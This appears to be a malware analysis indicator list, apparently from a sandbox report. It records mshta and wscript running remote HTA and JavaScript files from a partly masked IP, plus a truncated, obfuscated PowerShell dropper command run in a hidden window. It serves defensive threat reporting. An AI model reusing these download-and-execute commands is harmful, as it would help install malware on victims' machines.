Technical Information
- '<SYSTEM32>\mshta.exe' http://40.##.123.35/clean.hta
- '<SYSTEM32>\wscript.exe' "%APPDATA%\clean.js"
- %APPDATA%\clean.js
- '40.##.123.35':80
- 'i.##b.co':443
- http://40.##.123.35/clean.hta
- http://40.##.123.35/clean.js
- DNS ASK i.##b.co
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function QbrXupmzNqze($IftOUJswPoY, $aPZMBlwSgNqz){[IO.File]::WriteAllBytes($IftOUJswPoY, $aPZMBlwSgNqz)};function HqKBtlWQrbULFS($IftOUJswPoY){if($IftOUJswPoY.End...' (with hidden window)